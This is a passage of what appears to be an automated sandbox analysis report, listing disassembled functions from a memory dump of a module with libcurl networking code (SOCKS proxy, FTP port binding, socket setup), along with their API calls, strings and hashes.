                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • WSACloseEvent.WS2_32(50000000), ref: 6B797A66
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseEvent
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2624557715-0
                                                                                                                                            • Opcode ID: fbe951d98c0c64a2008258a0542f3ad92ecac6da50a950a2c71cefcad95c4b30
                                                                                                                                            • Instruction ID: dfa7c8e0a49af2723aaa4782830926f37e7f79daa19a36da1b83d938a73ee4e7
                                                                                                                                            • Opcode Fuzzy Hash: fbe951d98c0c64a2008258a0542f3ad92ecac6da50a950a2c71cefcad95c4b30
                                                                                                                                            • Instruction Fuzzy Hash: BF21F272904610ABEB21AF70FE89B8A77ECEF01718F1400B9F9295B541D77EE544C7A1
                                                                                                                                            Function 6B772370 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_easy_init
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4195830768-0
                                                                                                                                            • Opcode ID: 80d335f7a67d141ac17e50e64836d70d1bb3964088408b26f835571a19dee21c
                                                                                                                                            • Instruction ID: 017832e1edbd2ecd0da7fa91e01e4b67e387e831336d98e47f8bfeb472f7dcf5
                                                                                                                                            • Opcode Fuzzy Hash: 80d335f7a67d141ac17e50e64836d70d1bb3964088408b26f835571a19dee21c
                                                                                                                                            • Instruction Fuzzy Hash: D3F0B4333002042BDB006AADAE80AEAF7A8FB91178B004077FA1DD7A00D369A51142E1
                                                                                                                                            Function 6B7CF78D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RtlAllocateHeap.NTDLL(00000008,00000364,00000000,?,6B7CF6DD,00000001,00000364,00000015,000000FF), ref: 6B7CF7CE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                            • Opcode ID: 30e4208853e19bbef813fd46d33a391998f4db3647a66c352c62c3c8006d4259
                                                                                                                                            • Instruction ID: 9e7094f09b560c3aa8b96e75dbd1a97dce0748648eeb09bf63c48405f404635d
                                                                                                                                            • Opcode Fuzzy Hash: 30e4208853e19bbef813fd46d33a391998f4db3647a66c352c62c3c8006d4259
                                                                                                                                            • Instruction Fuzzy Hash: 55F024326051245FEB101B328F05B4F3B48BF42BB1FA1407EF824EE580DB6CD80442A3
                                                                                                                                            Function 6B7D0EBD Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,6B7D3F01,00000220,?,?,00000000,?,?,?,6B7C84AA,6B7C8987,00000000,?), ref: 6B7D0EEF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                            • Opcode ID: f9b88af43d7bec922e76f9d45c9b4622d11282639469b7f1ab0a30fbef181d0d
                                                                                                                                            • Instruction ID: eaaa5800934fbbf592574c9c1b5165c06bab784cff667b8e64f0ec42fa5361de
                                                                                                                                            • Opcode Fuzzy Hash: f9b88af43d7bec922e76f9d45c9b4622d11282639469b7f1ab0a30fbef181d0d
                                                                                                                                            • Instruction Fuzzy Hash: A6E0E5312491259FEB2036669F25B4F7F48DF827E1F01107CFD64A6580DF1CC80081A1
                                                                                                                                            Function 6B788A20 Relevance: 1.5, APIs: 1, Instructions: 26networkCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • socket.WS2_32(00000017,00000002,00000000), ref: 6B788A3D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: socket
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 98920635-0
                                                                                                                                            • Opcode ID: e1143f09ebc3269ac01e9de927a61af9a329e9c3b44a6d1f1a5ac4aec48deca9
                                                                                                                                            • Instruction ID: 852c1f2658f565af93873b316e82e1746670dfb33af00eb618f5b7d852fbc748
                                                                                                                                            • Opcode Fuzzy Hash: e1143f09ebc3269ac01e9de927a61af9a329e9c3b44a6d1f1a5ac4aec48deca9
                                                                                                                                            • Instruction Fuzzy Hash: B1E086356883046AED005A68EC46FE837984B06769F4442F0F53C9F6E1C765E841A721

                                                                                                                                            Non-executed Functions

                                                                                                                                            Function 6B77EEA0 Relevance: 63.7, APIs: 23, Strings: 13, Instructions: 663networkCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B77EFA1
                                                                                                                                            • _strncpy.LIBCMT ref: 6B77EFC7
                                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B77EFE8
                                                                                                                                            • inet_pton.WS2_32(00000017,?,?), ref: 6B77F006
                                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B77F078
                                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B77F0A9
                                                                                                                                            • curl_pushheader_bynum.LIBCURL(?,00000000,00000401), ref: 6B77F135
                                                                                                                                            • getsockname.WS2_32(?,?,?), ref: 6B77F1CC
                                                                                                                                            • WSAGetLastError.WS2_32(?,00000100), ref: 6B77F1E2
                                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B77F2ED
                                                                                                                                            • bind.WS2_32(FFFFFFFF,00000017,00000080), ref: 6B77F396
                                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B77F3A4
                                                                                                                                            • getsockname.WS2_32(?,00000017,00000080), ref: 6B77F407
                                                                                                                                            • WSAGetLastError.WS2_32(?,00000100), ref: 6B77F452
                                                                                                                                              • Part of subcall function 6B7AA0E0: GetLastError.KERNEL32(?,?,00000100), ref: 6B7AA0E7
                                                                                                                                              • Part of subcall function 6B7A05D0: curl_mvsnprintf.LIBCURL(?,00000100,6B79C830,?), ref: 6B7A0610
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$___from_strstr_to_strchr$getsockname$_strncpybindcurl_mvsnprintfcurl_pushheader_bynuminet_pton
                                                                                                                                            • String ID: %s %s$%s |%d|%s|%hu|$,%d,%d$EPRT$Failure sending EPRT command: %s$Failure sending PORT command: %s$PORT$bind() failed, we ran out of ports!$bind(port=%hu) failed: %s$bind(port=%hu) on non-local address failed: %s$failed to resolve the address provided to PORT: %s$getsockname() failed: %s$socket failure: %s
                                                                                                                                            • API String ID: 1437543408-2383553807
                                                                                                                                            • Opcode ID: 0f00671b409ffe66935537e58786025eae4862bd5e8b0c47ff94aaa7a9ea5276
                                                                                                                                            • Instruction ID: 2714787b9d509fe30483fe5172506376125058bd447e73a78d73997230f0ba6e
                                                                                                                                            • Opcode Fuzzy Hash: 0f00671b409ffe66935537e58786025eae4862bd5e8b0c47ff94aaa7a9ea5276
                                                                                                                                            • Instruction Fuzzy Hash: B032B271D40169ABDF309F24CE45BEEB7B9AF45304F0441F9F858A7240DB3A9A908FA1
                                                                                                                                            Function 6B7A75D0 Relevance: 56.9, APIs: 1, Strings: 31, Instructions: 939COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            • Excessive user name length for proxy auth, xrefs: 6B7A7AC3
                                                                                                                                            • Failed to resolve "%s" for SOCKS5 connect., xrefs: 6B7A7F06
                                                                                                                                            • SOCKS5: server resolving disabled for hostnames of length > 255 [actual len=%zu], xrefs: 6B7A7712
                                                                                                                                            • SOCKS5 GSS-API protection not yet implemented., xrefs: 6B7A802E
                                                                                                                                            • SOCKS5 connection to %s not supported, xrefs: 6B7A7EDE
                                                                                                                                            • Excessive password length for proxy auth, xrefs: 6B7A7B23
                                                                                                                                            • Unable to negotiate SOCKS5 GSS-API context., xrefs: 6B7A7A0B
                                                                                                                                            • User was rejected by the SOCKS5 server (%d %d)., xrefs: 6B7A7C75
                                                                                                                                            • Failed to send SOCKS5 sub-negotiation request., xrefs: 6B7A7BA7
                                                                                                                                            • SOCKS5 connect to IPv4 %s (locally resolved), xrefs: 6B7A7DD3
                                                                                                                                            • SOCKS5 reply has wrong address type., xrefs: 6B7A81F2
                                                                                                                                            • Unable to receive SOCKS5 sub-negotiation response., xrefs: 6B7A7C2C
                                                                                                                                            • Unable to receive initial SOCKS5 response., xrefs: 6B7A7861
                                                                                                                                            • warning: unsupported value passed to CURLOPT_SOCKS5_AUTH: %lu, xrefs: 6B7A7737
                                                                                                                                            • SOCKS5 reply has wrong version, version should be 5., xrefs: 6B7A80DE
                                                                                                                                            • SOCKS5 GSSAPI per-message authentication is not supported., xrefs: 6B7A7A2F
                                                                                                                                            • Unable to send initial SOCKS5 request., xrefs: 6B7A78B0
                                                                                                                                            • connection to proxy closed, xrefs: 6B7A821A
                                                                                                                                            • Failed to receive SOCKS5 connect request ack., xrefs: 6B7A809F, 6B7A81CE
                                                                                                                                            • unknown, xrefs: 6B7A760C
                                                                                                                                            • No authentication method was acceptable., xrefs: 6B7A7A57
                                                                                                                                            • SOCKS5 connect to IPv6 %s (locally resolved), xrefs: 6B7A7EB5
                                                                                                                                            • Undocumented SOCKS5 mode attempted to be used by server., xrefs: 6B7A7A7B
                                                                                                                                            • Failed to send SOCKS5 connect request., xrefs: 6B7A7FED
                                                                                                                                            • SOCKS5: connecting to HTTP proxy %s port %d, xrefs: 6B7A76ED
                                                                                                                                            • Can't complete SOCKS5 connection to %s. (%d), xrefs: 6B7A8118
                                                                                                                                            • Connection to proxy closed, xrefs: 6B7A790D
                                                                                                                                            • SOCKS5 request granted., xrefs: 6B7A8259
                                                                                                                                            • SOCKS5 connect to %s:%d (remotely resolved), xrefs: 6B7A7F70
                                                                                                                                            • Received invalid version in initial SOCKS5 response., xrefs: 6B7A7940
                                                                                                                                            • :%d, xrefs: 6B7A7D63
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_mvsnprintf$curl_msnprintf
                                                                                                                                            • String ID: :%d$Can't complete SOCKS5 connection to %s. (%d)$Connection to proxy closed$Excessive password length for proxy auth$Excessive user name length for proxy auth$Failed to receive SOCKS5 connect request ack.$Failed to resolve "%s" for SOCKS5 connect.$Failed to send SOCKS5 connect request.$Failed to send SOCKS5 sub-negotiation request.$No authentication method was acceptable.$Received invalid version in initial SOCKS5 response.$SOCKS5 GSS-API protection not yet implemented.$SOCKS5 GSSAPI per-message authentication is not supported.$SOCKS5 connect to %s:%d (remotely resolved)$SOCKS5 connect to IPv4 %s (locally resolved)$SOCKS5 connect to IPv6 %s (locally resolved)$SOCKS5 connection to %s not supported$SOCKS5 reply has wrong address type.$SOCKS5 reply has wrong version, version should be 5.$SOCKS5 request granted.$SOCKS5: connecting to HTTP proxy %s port %d$SOCKS5: server resolving disabled for hostnames of length > 255 [actual len=%zu]$Unable to negotiate SOCKS5 GSS-API context.$Unable to receive SOCKS5 sub-negotiation response.$Unable to receive initial SOCKS5 response.$Unable to send initial SOCKS5 request.$Undocumented SOCKS5 mode attempted to be used by server.$User was rejected by the SOCKS5 server (%d %d).$connection to proxy closed$unknown$warning: unsupported value passed to CURLOPT_SOCKS5_AUTH: %lu
                                                                                                                                            • API String ID: 2260702874-704893380
                                                                                                                                            • Opcode ID: b613ee03452f4fb2f8e50bb74333c3fb8b5afd28f98842fffc31d62953e4b52d
                                                                                                                                            • Instruction ID: 325fcdbd84159b61de5348f4a131830ce725d7d094a15e2a8563c8dc637bf451
                                                                                                                                            • Opcode Fuzzy Hash: b613ee03452f4fb2f8e50bb74333c3fb8b5afd28f98842fffc31d62953e4b52d
                                                                                                                                            • Instruction Fuzzy Hash: A762E371A002189BDB55CF28DE86BEEB7B0EF45304F0046FEF85A97241D73A9A45CB61
                                                                                                                                            Function 6B7739A0 Relevance: 37.1, APIs: 13, Strings: 8, Instructions: 395networkCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • curl_pushheader_bynum.LIBCURL(?,?,?,?,?,00000100,?,?,?,?,?,?,?,?,?,?), ref: 6B773AC2
                                                                                                                                            • inet_pton.WS2_32(00000017,?,?), ref: 6B773BA2
                                                                                                                                            • htons.WS2_32(?), ref: 6B773BB9
                                                                                                                                            • inet_pton.WS2_32(00000002,?,?), ref: 6B773CED
                                                                                                                                            • htons.WS2_32(?), ref: 6B773D08
                                                                                                                                              • Part of subcall function 6B7A06B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,$lyk), ref: 6B7A06EF
                                                                                                                                              • Part of subcall function 6B7A06B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B7A072F
                                                                                                                                            • bind.WS2_32(?,?,00000000), ref: 6B773DAF
                                                                                                                                            • htons.WS2_32(?), ref: 6B773DE9
                                                                                                                                            • bind.WS2_32(?,?,00000000), ref: 6B773E02
                                                                                                                                            • getsockname.WS2_32(?,?,00000080), ref: 6B773E3D
                                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B773E4B
                                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B773E91
                                                                                                                                            Strings
                                                                                                                                            • Local port: %hu, xrefs: 6B773EDB
                                                                                                                                            • Name '%s' family %i resolved to '%s' family %i, xrefs: 6B773C90
                                                                                                                                            • Local Interface %s is ip %s using address family %i, xrefs: 6B773B78
                                                                                                                                            • bind failed with errno %d: %s, xrefs: 6B773EB3
                                                                                                                                            • Couldn't bind to '%s', xrefs: 6B773D26
                                                                                                                                            • getsockname() failed with errno %d: %s, xrefs: 6B773E6D
                                                                                                                                            • Bind to local port %hu failed, trying next, xrefs: 6B773DD9
                                                                                                                                            • Couldn't bind to interface '%s', xrefs: 6B773BE4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: htons$ErrorLastbindinet_pton$curl_msnprintfcurl_mvsnprintfcurl_pushheader_bynumgetsockname
                                                                                                                                            • String ID: Bind to local port %hu failed, trying next$Couldn't bind to '%s'$Couldn't bind to interface '%s'$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$getsockname() failed with errno %d: %s
                                                                                                                                            • API String ID: 2165106075-2769131373
                                                                                                                                            • Opcode ID: f06ab685b9245adcae1257ac0e3b7d15a2f7c2a5e047db27309eec85287c6e13
                                                                                                                                            • Instruction ID: ae22811786b2805762e25edb800506d6fe3a4a31520d32c75a0869f30d33fe5f
                                                                                                                                            • Opcode Fuzzy Hash: f06ab685b9245adcae1257ac0e3b7d15a2f7c2a5e047db27309eec85287c6e13
                                                                                                                                            • Instruction Fuzzy Hash: 5DE18D75A01119ABDF209F24CE89FAE77B8EF45344F0041F9F909D7241EB39AE469B60
                                                                                                                                            Function 6B7A6F40 Relevance: 33.8, APIs: 1, Strings: 18, Instructions: 550COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            • Too long SOCKS proxy user name, can't use!, xrefs: 6B7A70C9
                                                                                                                                            • Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown., xrefs: 6B7A756A
                                                                                                                                            • SOCKS4%s request granted., xrefs: 6B7A744B
                                                                                                                                            • SOCKS4 connection to %s not supported, xrefs: 6B7A71D6
                                                                                                                                            • Hostname '%s' was found, xrefs: 6B7A7113
                                                                                                                                            • Failed to resolve "%s" for SOCKS4 connect., xrefs: 6B7A71FD
                                                                                                                                            • connection to proxy closed, xrefs: 6B7A73BA
                                                                                                                                            • SOCKS4 non-blocking resolve of %s, xrefs: 6B7A7064
                                                                                                                                            • Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids., xrefs: 6B7A7523
                                                                                                                                            • Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed., xrefs: 6B7A7495
                                                                                                                                            • SOCKS4: too long host name, xrefs: 6B7A72F5
                                                                                                                                            • SOCKS4 communication to %s:%d, xrefs: 6B7A700A
                                                                                                                                            • SOCKS4: Failed receiving connect request ack: %s, xrefs: 6B7A7392
                                                                                                                                            • Failed to send SOCKS4 connect request., xrefs: 6B7A72D1
                                                                                                                                            • SOCKS4 connect to IPv4 %s (locally resolved), xrefs: 6B7A7188
                                                                                                                                            • SOCKS4 reply has wrong version, version should be 0., xrefs: 6B7A7403
                                                                                                                                            • Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client., xrefs: 6B7A74DC
                                                                                                                                            • SOCKS4%s: connecting to HTTP proxy %s port %d, xrefs: 6B7A6FF6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_mvsnprintf
                                                                                                                                            • String ID: Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.$Failed to resolve "%s" for SOCKS4 connect.$Failed to send SOCKS4 connect request.$Hostname '%s' was found$SOCKS4 communication to %s:%d$SOCKS4 connect to IPv4 %s (locally resolved)$SOCKS4 connection to %s not supported$SOCKS4 non-blocking resolve of %s$SOCKS4 reply has wrong version, version should be 0.$SOCKS4%s request granted.$SOCKS4%s: connecting to HTTP proxy %s port %d$SOCKS4: Failed receiving connect request ack: %s$SOCKS4: too long host name$Too long SOCKS proxy user name, can't use!$connection to proxy closed
                                                                                                                                            • API String ID: 3418963191-1991471026
                                                                                                                                            • Opcode ID: ea91ee51ca9b7480ecf40550bf5129680270a325f8d5e255f196d3cfce0e9cbd
                                                                                                                                            • Instruction ID: 6fb9e03e83a0c85047101911789e8634897c6ef1e7fe9ca3f709813934dd8ded
                                                                                                                                            • Opcode Fuzzy Hash: ea91ee51ca9b7480ecf40550bf5129680270a325f8d5e255f196d3cfce0e9cbd
                                                                                                                                            • Instruction Fuzzy Hash: 60123671A002449FCB50CFB8DA55BBEFBF4EF49304F0446AAF86A96241DB3DA510CB60
                                                                                                                                            Function 6B7AAE50 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 164libraryloadernetworkCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • WSAStartup.WS2_32(00000202,?), ref: 6B7AAE75
                                                                                                                                            • WSACleanup.WS2_32 ref: 6B7AAE90
                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,?,?), ref: 6B7AAEBF
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,LoadLibraryExA), ref: 6B7AAEDD
                                                                                                                                            • _strpbrk.LIBCMT ref: 6B7AAEEF
                                                                                                                                            • LoadLibraryA.KERNEL32(iphlpapi.dll,?,?), ref: 6B7AAF16
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,AddDllDirectory), ref: 6B7AAF2D
                                                                                                                                            • GetSystemDirectoryA.KERNEL32(00000000,00000000), ref: 6B7AAF50
                                                                                                                                            • GetSystemDirectoryA.KERNEL32(00000000,?), ref: 6B7AAF7E
                                                                                                                                            • LoadLibraryA.KERNEL32(00000000,?,?,?), ref: 6B7AAFDB
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,if_nametoindex), ref: 6B7AAFFE
                                                                                                                                            • QueryPerformanceFrequency.KERNEL32(6B7F3B50,?,?,?,?,?,?), ref: 6B7AB033
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc$DirectoryLibraryLoadSystem$CleanupFrequencyHandleModulePerformanceQueryStartup_strpbrk
                                                                                                                                            • String ID: AddDllDirectory$LoadLibraryExA$if_nametoindex$iphlpapi.dll$kernel32
                                                                                                                                            • API String ID: 945793807-2794540096
                                                                                                                                            • Opcode ID: f7bf005eabcc0a68a00d5975d1ae40c3b5f4a69890c38063b06b3162934bca43
                                                                                                                                            • Instruction ID: 43cf4679b46af5db94df21c2a19f5b4b102bbe16a91082be1579357c4f3c7187
                                                                                                                                            • Opcode Fuzzy Hash: f7bf005eabcc0a68a00d5975d1ae40c3b5f4a69890c38063b06b3162934bca43
                                                                                                                                            • Instruction Fuzzy Hash: 1C512770644201ABEB664F749E4AF6E77A4AF87740F0402B9FD25A6381EF39D506CB60
                                                                                                                                            Function 6B79DCD0 Relevance: 26.7, APIs: 4, Strings: 11, Instructions: 417COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • curl_multi_remove_handle.LIBCURL(?,?,?,00000000,00000000), ref: 6B79DD78
                                                                                                                                              • Part of subcall function 6B7A05D0: curl_mvsnprintf.LIBCURL(?,00000100,6B79C830,?), ref: 6B7A0610
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
